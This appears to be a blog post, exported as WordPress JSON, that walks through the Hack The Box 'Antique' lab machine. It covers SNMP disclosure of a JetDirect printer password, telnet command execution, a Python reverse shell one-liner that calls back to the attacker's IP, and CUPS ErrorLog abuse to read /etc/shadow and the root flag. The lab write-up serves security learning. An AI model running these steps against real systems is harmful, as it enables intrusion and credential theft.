{"id":195,"date":"2022-06-21T01:12:45","date_gmt":"2022-06-21T01:12:45","guid":{"rendered":"https:\/\/jasonlcurby.com\/blog\/?p=195"},"modified":"2023-08-06T06:59:17","modified_gmt":"2023-08-06T06:59:17","slug":"antique-machine-walkthrough-hack-the-box","status":"publish","type":"post","link":"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/","title":{"rendered":"Antique Machine Walkthrough \u2013 Hack The Box"},"content":{"rendered":"\n

Antique<\/strong> is rated as an easy machine on HTB.<\/p>\n\n\n\n

Enumeration<\/strong><\/p>\n\n\n\n

First we grab the .ovpn<\/em> file for the VPN and connect to the network from our machine: openvpn rofo.ovpn. <\/em>An initial nmap of the target is next. Then the nmap:<\/p>\n\n\n\n

nmap: nmap -sV -open -vvv -oA initial_scan 10.10.11.107<\/span><\/p>\n\n\n\n

Result is an open port 23\/tcp telnet? \u2013 unrecognized fingerprint<\/em> – however reading through the long fingerprint string gives us a clue – it is filled with references to HP JetDIrect.<\/em> <\/p>\n\n\n\n

Which on research is a technology sold by Hewlett-Packard that allows computer printers to be directly attached to a Local Area Network. Considering the name of the machine (Antique) and the fact JetDirect was introduced in March 1991 (with a presumably long history of exploits), this is likely it. <\/p>\n\n\n\n

Run a deeper port specific nmap scan on 23 to try get more detailed information. <\/p>\n\n\n\n

sudo nmap -Pn -v -sV -sC -sSV –version-intensity 9 –script=banner -oA port_scan 10.10.11.107 -p 23<\/span><\/p>\n\n\n\n

While that is running a searchsploit JetDirect gives us a bunch of potential exploits. <\/p>\n\n\n\n

\"Searchsploit
Searchsploit jetdirect for any exploits we can take advantage of for our target.<\/span><\/figcaption><\/figure>\n\n\n\n

The deeper nmap <\/em>scan finishes, giving us not much extra to go off in terms of potential versions, although versions aren\u2019t specified in the exploits we do find.<\/p>\n\n\n\n

\"Deeper
Deeper namp scan of the 23\/tcp open telnet port.<\/span><\/figcaption><\/figure>\n\n\n\n

We’ll run msfconsole <\/em>and start looking for Metasploit supported JetDirect exploits that we can take advantage of. The most promising hit is HP JetDirect Path Traversal Arbitrary Code Execution<\/span> \u2013 disclosed in 2017. This exploits a path traversal vie JetDirect to gain arbitrary code execution by writing a shell script that is loaded on start-up to \/etc\/profile.d<\/em>.<\/p>\n\n\n\n

\"The
The HP JetDirect Path Traversal exploit supported on Metasploit.<\/span><\/figcaption><\/figure>\n\n\n\n

The options are straightforward enough – except I keep getting badValue <\/em>and noSuchInstance<\/em> responses. So I’ve either misconfigured something here, am missing something simple, or the target is not reachable for some other reason. Changing the port option in the Metasploit exploit from any value but the default gives us a connection refused error regardless \u2013 so we\u2019ll stick with 161 for now. <\/p>\n\n\n\n

After trying a number of times, I decide to leave this exploit on the backburner and do some further reading. I\u2019d like to see if I can get it working down the road though, but I’m not sure if I have the correct (default) SNMP port or missing something obvious \u2013 so I run another nmap <\/em>scan with a wider port-range as well as for UDP ports.<\/p>\n\n\n\n

sudo nmap -sV 10.10.11.107 -Pn -open -vvv -sU<\/span><\/p>\n\n\n\n

This finds the port 161\/udp. We run a deeper scan to get a more detailed overview of the port.<\/p>\n\n\n\n

sudo nmap -sV 10.10.11.107 -Pn -open -vvv -sU -p 161<\/span><\/p>\n\n\n\n

\"Open
Open snmp port on the target.<\/span><\/figcaption><\/figure>\n\n\n\n

I begin research on the next potential attack on the target – the SNMP JetAdmin Device Password Disclosure<\/span>. By sending SMPT GET requests to a vulnerable printer, the printer will return the hex-encoded device password to the requester. If I can decode this, I could get access to the printer, allowing a remote user to access and change its configuration. The example I’m following online is using the Web32 app snmputil<\/em>. Let\u2019s try and get it working from Kali. First step is to enumerate the SNMP service using Kali\u2019s snmpwalk <\/em>command:<\/p>\n\n\n\n

snmpwalk -v 2c -c public 10.10.11.107<\/span><\/p>\n\n\n\n

Running this command responds with the string \u201cHTB Printer\u201d, confirming that it is a JetDirect printer and I’m likely approaching this the right way. Let\u2019s try and send an SMPT request to the printer and see if we can get the device password disclosure mentioned in the exploit details above.<\/p>\n\n\n\n

snmpwalk -v 2c -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0<\/span> (although just .1 works as it still dumps the response<\/em>)<\/p>\n\n\n\n

\"Snmpwalk
Snmpwalk to the target gives us a hex-encoded password we can decode.<\/span><\/figcaption><\/figure>\n\n\n\n

The response post \u201cBITS: ..\u201d followed by a print out of hex values. We pump this into a hex decoder to get readable text – although the first site I used didn’t like it at all. A working conversion gives us what is obviously a correctly decoded password:<\/p>\n\n\n\n

\"\"
Hex to text converter of the output string gives us the printer password.<\/span><\/figcaption><\/figure>\n\n\n\n

It’s likely P@ssw0rd@123!!123<\/em> \u2013 considering the ?? characters following. So now we have a password to the printer \u2013 let\u2019s try and connect to it directly. We telnet into the originally scanned open telnet? port 23. And we’re in – pressing ? for help as per the login message. <\/p>\n\n\n\n

Here I spend a bit of time trying to output configs, raw ports and any settings that might give me something. However the answer is plainly obvious. The second last parameter allows the execution of system commands ie. exec id<\/em>. We’ll try running exec <\/em>as if we’re in a shell. exec id<\/em> gives us the user: uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)<\/em>. An exec ls<\/em> gets us 2 files: telnet.py<\/em> and user.txt <\/em>\u2013 exec cat user.txt<\/em> gets us the user flag.<\/p>\n\n\n\n

\"Entering
Entering the printer and viewing the available commands with the ? command. Followed by ls and cat.<\/span><\/figcaption><\/figure>\n\n\n\n

Reverse Shell<\/strong><\/p>\n\n\n\n

Next we go for the system flag using privilege escalation. Sudo -l<\/em> is locked out by the user lp<\/em> password. I need to find this or admin credentials in order to dig deeper into the target. exec cat telnet.py <\/em>to view the file that controls the connection to the printer – I’ll see if I can use this file in the future to establish any kind of privilege escalate or reverse shell if I can’t using purely exec<\/em>.<\/p>\n\n\n\n

I\u2019d like to see if I can initiate a reverse shell, so we establish a listener on our machine:<\/p>\n\n\n\n

nc -lvnp 1234<\/span><\/p>\n\n\n\n

and see if we can connect from the target machine with a shell using python3:<\/p>\n\n\n\n

exec python3 -c ‘socket=__import__(“socket”);os=__import__(“os”);pty=__import__(“pty”);s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.5”,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“\/bin\/sh”)’<\/span><\/p>\n\n\n\n

And it works – we\u2019re connected to our local listener, achieving a reverse shell as the lp <\/em>user. Now to upgrade it to TTY.<\/p>\n\n\n\n

python3 -c ‘import pty; pty.spawn(“\/bin\/bash”)’<\/span><\/p>\n\n\n\n

go to \/etc to dig around<\/p>\n\n\n\n

Do some grep <\/em>searches of the directory tree for \u2018login\u2019 and \u2018password\u2019, \u201cadmin\u201d:<\/p>\n\n\n\n

find . -type f  -exec  grep “rofo” ‘{}’ \\; -print<\/span><\/p>\n\n\n\n

Nothing yet, cat <\/em>some .conf<\/em> files, logs, whatever I can find. Run a netstat -ant<\/em> to see if I can find anything else exploitable running on the machine. There\u2019s something running on localhost <\/em>port 631. Research shows it’s Internet Printing Protocol (IPP) \u2013 standard in mobile and cloud printing. Importantly, it\u2019s based on HTTP, it takes POSTs sent to the server listening on the port. If it\u2019s HTTP and takes POST, does it take GETs?<\/p>\n\n\n\n

A curl <\/em>to 127.0.0.1:631 from the target machine gets a HTML response as if it\u2019s a webpage, so either I work with these requests in the shell or view the service in a browser. Within the curl we see the title <TITLE>Home \u2013 CUPS 1.6.1<\/TITLE><\/em>, and a description of CURPs as being a standards-based, open source printing system developed by Apple Inc. for OS X and other UNIX-like operating systems.<\/p>\n\n\n\n

Lets search exploits for CUPS 1.6.1:<\/p>\n\n\n\n

\"Searchsploit
Searchsploit Cups 1.6.1 for any potential attack vectors.<\/span><\/figcaption><\/figure>\n\n\n\n

Research online for CUPS 1.6.1 exploit returns a root file read exploit supported by Metasploit, of which a search shows the exploit available. CUPS allows members of the lpadmin <\/em>group \u2013 which we saw in id <\/em>when connected \u2013 to make changes to the cupsd.conf <\/em>configuration, which can specific an Error Log path. This can be read and is printed as plaintext \u2013 so we can read potential login credentials or flags with escalated privileges to root. The Metasploit script requires a SESSION and connection to CUPS \u2013 but it\u2019s sitting on our target and unreachable externally.<\/p>\n\n\n\n

\"Cups
Cups 1.6.1 Root File Read exploit.<\/span><\/figcaption><\/figure>\n\n\n\n

Further reading and exploring and I can find the cupsd.conf<\/em> file in \/etc\/cups\/cupsd.conf<\/em> \u2013 however I don\u2019t have permission to edit it from here. I go reading through the documentation for CUPS and come across a cupsctrl<\/em>. cupsctl <\/em>updates or queries the cupsd.conf <\/em>file for a server. When no changes are requested, the current  configuration values are written to the standard output in the format “name=value”, one per line. Re-reading information on the exploit page details how this can be achieved: Warning: if the user has set up a custom path to the CUPS error log, this module might fail to reset that path correctly. You can specify a custom error log path with the ERROR_LOG datastore option. So we try:<\/p>\n\n\n\n

cupsctl ErrorLog=”rofo”<\/span><\/p>\n\n\n\n

I can see this adds or edits the ErrorLog <\/em>now appended to the end of the cupsd.conf<\/em> file. I run it a second time to confirm the value changes.<\/p>\n\n\n\n

\"The
The ErrorLog value added to the end of the cupsd.conf file as root.<\/span><\/figcaption><\/figure>\n\n\n\n

Now how do I retrieve this via curl? Further reading on later exploits (specifically CVE-2012-5519) \u2013 looking for references to a CUPS error log file \u2013 yields the path to the error_log page: \/admin\/log\/error_log<\/em>. So a curl <\/em>there is next.<\/p>\n\n\n\n

curl 127.0.0.1:631\/admin\/log\/error_log<\/span><\/p>\n\n\n\n

It does give me a successful response \u2013 however looks like it\u2019s looking for something that doesn\u2019t exist (obviously rofoTEST<\/em>) so the title of the html page return is Not Found. <\/p>\n\n\n\n

\"A
A curl to the error log file gives us a response – but to a non-existent file.<\/span><\/figcaption><\/figure>\n\n\n\n

We\u2019ll set it to the default listed in the Metasploit setting that we couldn\u2019t use from outside the system: \/etc\/shadow\/<\/em>.<\/p>\n\n\n\n

cupsctl ErrorLog=”\/etc\/shadow\/”<\/span><\/p>\n\n\n\n

This returns the expected output of what must be the file within. <\/p>\n\n\n\n

\"Curl
Curl of the error_log when we have a file that exists on the target (Metasploit default \/etc\/shadow\/).<\/span><\/figcaption><\/figure>\n\n\n\n

Next let\u2019s try to find flag.txt or root.txt. After a few directory and file attempts, found it:<\/p>\n\n\n\n

\"Finding
Finding the root.txt flag with the root error_log file exploit and curl.<\/span><\/figcaption><\/figure>\n","protected":false},"excerpt":{"rendered":"

Antique is rated as an easy machine on HTB. Enumeration First we grab the .ovpn file for the VPN and connect to the network from our machine: openvpn rofo.ovpn. An initial nmap of the target is next. Then the nmap: nmap: nmap -sV -open -vvv -oA initial_scan 10.10.11.107 Result is an open port 23\/tcp telnet? \u2013 unrecognized fingerprint – […]<\/p>\n","protected":false},"author":1,"featured_media":587,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,9],"tags":[],"class_list":["post-195","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","category-hack-the-box"],"yoast_head":"\nAntique Machine Walkthrough \u2013 Hack The Box - JLC<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Antique Machine Walkthrough \u2013 Hack The Box - JLC\" \/>\n<meta property=\"og:description\" content=\"Antique is rated as an easy machine on HTB. Enumeration First we grab the .ovpn file for the VPN and connect to the network from our machine: openvpn rofo.ovpn. An initial nmap of the target is next. Then the nmap: nmap: nmap -sV -open -vvv -oA initial_scan 10.10.11.107 Result is an open port 23\/tcp telnet? \u2013 unrecognized fingerprint – […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/\" \/>\n<meta property=\"og:site_name\" content=\"JLC\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/jason.curby\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/jason.curby\" \/>\n<meta property=\"article:published_time\" content=\"2022-06-21T01:12:45+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-08-06T06:59:17+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2023\/08\/antique-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"955\" \/>\n\t<meta property=\"og:image:height\" content=\"217\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"rofo\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/JasonCurby\" \/>\n<meta name=\"twitter:site\" content=\"@JasonCurby\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"rofo\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/2022\\\/06\\\/21\\\/antique-machine-walkthrough-hack-the-box\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/2022\\\/06\\\/21\\\/antique-machine-walkthrough-hack-the-box\\\/\"},\"author\":{\"name\":\"rofo\",\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/#\\\/schema\\\/person\\\/187b41b22ffae39c83b69ddc480ea1f3\"},\"headline\":\"Antique Machine Walkthrough \u2013 Hack The Box\",\"datePublished\":\"2022-06-21T01:12:45+00:00\",\"dateModified\":\"2023-08-06T06:59:17+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/2022\\\/06\\\/21\\\/antique-machine-walkthrough-hack-the-box\\\/\"},\"wordCount\":1702,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/#\\\/schema\\\/person\\\/187b41b22ffae39c83b69ddc480ea1f3\"},\"image\":{\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/2022\\\/06\\\/21\\\/antique-machine-walkthrough-hack-the-box\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/antique-1.jpg\",\"articleSection\":[\"Cybersecurity\",\"Hack The Box\"],\"inLanguage\":\"en-AU\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/2022\\\/06\\\/21\\\/antique-machine-walkthrough-hack-the-box\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/2022\\\/06\\\/21\\\/antique-machine-walkthrough-hack-the-box\\\/\",\"url\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/2022\\\/06\\\/21\\\/antique-machine-walkthrough-hack-the-box\\\/\",\"name\":\"Antique Machine Walkthrough \u2013 Hack The Box - JLC\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/2022\\\/06\\\/21\\\/antique-machine-walkthrough-hack-the-box\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/2022\\\/06\\\/21\\\/antique-machine-walkthrough-hack-the-box\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/antique-1.jpg\",\"datePublished\":\"2022-06-21T01:12:45+00:00\",\"dateModified\":\"2023-08-06T06:59:17+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/2022\\\/06\\\/21\\\/antique-machine-walkthrough-hack-the-box\\\/#breadcrumb\"},\"inLanguage\":\"en-AU\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/2022\\\/06\\\/21\\\/antique-machine-walkthrough-hack-the-box\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-AU\",\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/2022\\\/06\\\/21\\\/antique-machine-walkthrough-hack-the-box\\\/#primaryimage\",\"url\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/antique-1.jpg\",\"contentUrl\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/08\\\/antique-1.jpg\",\"width\":955,\"height\":217},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/2022\\\/06\\\/21\\\/antique-machine-walkthrough-hack-the-box\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Antique Machine Walkthrough \u2013 Hack The Box\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/\",\"name\":\"JLC\",\"description\":\"Rofo\",\"publisher\":{\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/#\\\/schema\\\/person\\\/187b41b22ffae39c83b69ddc480ea1f3\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-AU\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/#\\\/schema\\\/person\\\/187b41b22ffae39c83b69ddc480ea1f3\",\"name\":\"rofo\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-AU\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d2dd9850d47eebbd37c03d0e52e99b93092ad17dac4f99a7154b214dfe78d894?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d2dd9850d47eebbd37c03d0e52e99b93092ad17dac4f99a7154b214dfe78d894?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d2dd9850d47eebbd37c03d0e52e99b93092ad17dac4f99a7154b214dfe78d894?s=96&d=mm&r=g\",\"caption\":\"rofo\"},\"logo\":{\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d2dd9850d47eebbd37c03d0e52e99b93092ad17dac4f99a7154b214dfe78d894?s=96&d=mm&r=g\"},\"sameAs\":[\"https:\\\/\\\/jasonlcurby.com\\\/blog\",\"https:\\\/\\\/www.facebook.com\\\/jason.curby\",\"https:\\\/\\\/www.instagram.com\\\/jasoncurby\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/jason-curby\\\/\",\"https:\\\/\\\/x.com\\\/https:\\\/\\\/twitter.com\\\/JasonCurby\"],\"url\":\"https:\\\/\\\/jasonlcurby.com\\\/blog\\\/author\\\/jlcurby\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Antique Machine Walkthrough \u2013 Hack The Box - JLC","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/","og_locale":"en_US","og_type":"article","og_title":"Antique Machine Walkthrough \u2013 Hack The Box - JLC","og_description":"Antique is rated as an easy machine on HTB. Enumeration First we grab the .ovpn file for the VPN and connect to the network from our machine: openvpn rofo.ovpn. An initial nmap of the target is next. Then the nmap: nmap: nmap -sV -open -vvv -oA initial_scan 10.10.11.107 Result is an open port 23\/tcp telnet? \u2013 unrecognized fingerprint – […]","og_url":"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/","og_site_name":"JLC","article_publisher":"https:\/\/www.facebook.com\/jason.curby","article_author":"https:\/\/www.facebook.com\/jason.curby","article_published_time":"2022-06-21T01:12:45+00:00","article_modified_time":"2023-08-06T06:59:17+00:00","og_image":[{"width":955,"height":217,"url":"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2023\/08\/antique-1.jpg","type":"image\/jpeg"}],"author":"rofo","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/JasonCurby","twitter_site":"@JasonCurby","twitter_misc":{"Written by":"rofo","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/#article","isPartOf":{"@id":"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/"},"author":{"name":"rofo","@id":"https:\/\/jasonlcurby.com\/blog\/#\/schema\/person\/187b41b22ffae39c83b69ddc480ea1f3"},"headline":"Antique Machine Walkthrough \u2013 Hack The Box","datePublished":"2022-06-21T01:12:45+00:00","dateModified":"2023-08-06T06:59:17+00:00","mainEntityOfPage":{"@id":"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/"},"wordCount":1702,"commentCount":0,"publisher":{"@id":"https:\/\/jasonlcurby.com\/blog\/#\/schema\/person\/187b41b22ffae39c83b69ddc480ea1f3"},"image":{"@id":"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/#primaryimage"},"thumbnailUrl":"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2023\/08\/antique-1.jpg","articleSection":["Cybersecurity","Hack The Box"],"inLanguage":"en-AU","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/","url":"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/","name":"Antique Machine Walkthrough \u2013 Hack The Box - JLC","isPartOf":{"@id":"https:\/\/jasonlcurby.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/#primaryimage"},"image":{"@id":"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/#primaryimage"},"thumbnailUrl":"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2023\/08\/antique-1.jpg","datePublished":"2022-06-21T01:12:45+00:00","dateModified":"2023-08-06T06:59:17+00:00","breadcrumb":{"@id":"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/#breadcrumb"},"inLanguage":"en-AU","potentialAction":[{"@type":"ReadAction","target":["https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/"]}]},{"@type":"ImageObject","inLanguage":"en-AU","@id":"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/#primaryimage","url":"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2023\/08\/antique-1.jpg","contentUrl":"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2023\/08\/antique-1.jpg","width":955,"height":217},{"@type":"BreadcrumbList","@id":"https:\/\/jasonlcurby.com\/blog\/2022\/06\/21\/antique-machine-walkthrough-hack-the-box\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/jasonlcurby.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Antique Machine Walkthrough \u2013 Hack The Box"}]},{"@type":"WebSite","@id":"https:\/\/jasonlcurby.com\/blog\/#website","url":"https:\/\/jasonlcurby.com\/blog\/","name":"JLC","description":"Rofo","publisher":{"@id":"https:\/\/jasonlcurby.com\/blog\/#\/schema\/person\/187b41b22ffae39c83b69ddc480ea1f3"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/jasonlcurby.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-AU"},{"@type":["Person","Organization"],"@id":"https:\/\/jasonlcurby.com\/blog\/#\/schema\/person\/187b41b22ffae39c83b69ddc480ea1f3","name":"rofo","image":{"@type":"ImageObject","inLanguage":"en-AU","@id":"https:\/\/secure.gravatar.com\/avatar\/d2dd9850d47eebbd37c03d0e52e99b93092ad17dac4f99a7154b214dfe78d894?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/d2dd9850d47eebbd37c03d0e52e99b93092ad17dac4f99a7154b214dfe78d894?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d2dd9850d47eebbd37c03d0e52e99b93092ad17dac4f99a7154b214dfe78d894?s=96&d=mm&r=g","caption":"rofo"},"logo":{"@id":"https:\/\/secure.gravatar.com\/avatar\/d2dd9850d47eebbd37c03d0e52e99b93092ad17dac4f99a7154b214dfe78d894?s=96&d=mm&r=g"},"sameAs":["https:\/\/jasonlcurby.com\/blog","https:\/\/www.facebook.com\/jason.curby","https:\/\/www.instagram.com\/jasoncurby\/","https:\/\/www.linkedin.com\/in\/jason-curby\/","https:\/\/x.com\/https:\/\/twitter.com\/JasonCurby"],"url":"https:\/\/jasonlcurby.com\/blog\/author\/jlcurby\/"}]}},"_links":{"self":[{"href":"https:\/\/jasonlcurby.com\/blog\/wp-json\/wp\/v2\/posts\/195","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jasonlcurby.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jasonlcurby.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jasonlcurby.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/jasonlcurby.com\/blog\/wp-json\/wp\/v2\/comments?post=195"}],"version-history":[{"count":30,"href":"https:\/\/jasonlcurby.com\/blog\/wp-json\/wp\/v2\/posts\/195\/revisions"}],"predecessor-version":[{"id":588,"href":"https:\/\/jasonlcurby.com\/blog\/wp-json\/wp\/v2\/posts\/195\/revisions\/588"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jasonlcurby.com\/blog\/wp-json\/wp\/v2\/media\/587"}],"wp:attachment":[{"href":"https:\/\/jasonlcurby.com\/blog\/wp-json\/wp\/v2\/media?parent=195"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jasonlcurby.com\/blog\/wp-json\/wp\/v2\/categories?post=195"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jasonlcurby.com\/blog\/wp-json\/wp\/v2\/tags?post=195"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}